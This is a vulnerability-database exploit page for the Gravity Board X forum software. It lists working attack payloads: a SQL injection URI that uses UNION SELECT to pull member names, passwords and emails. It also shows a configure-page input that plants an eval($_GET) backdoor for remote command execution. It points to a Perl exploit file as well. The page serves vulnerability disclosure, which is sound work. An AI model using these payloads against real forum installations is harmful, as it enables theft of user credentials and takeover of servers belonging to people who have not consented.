• info
• discussion
• exploit
• solution
• references

Gravity Board X Multiple SQL Injection Vulnerabilities and Remote Command Execution Vulnerability

Attackers can use a browser to exploit these issues.

The following example URIs and data are available:

SQL-injections:

http://www.example.com/index.php?action=viewprofile&member_id=slider-

http://www.example.com/index.php?action=viewboard&board_id=m0nzt3r-loleg-too'+union+select+0,concat_ws(char(58),displayname,pw,email),2+from+gbx_members+where+1='1

Code exec:

Go: http://www.example.com/index.php?action=configure
Enter Board Name: xXx";if(isset($_GET[c]))eval($_GET[c]);#
Go: http://www.example.com/index.php?ok=phpinfo();

The following exploit is available:

• /data/vulnerabilities/exploits/34370.pl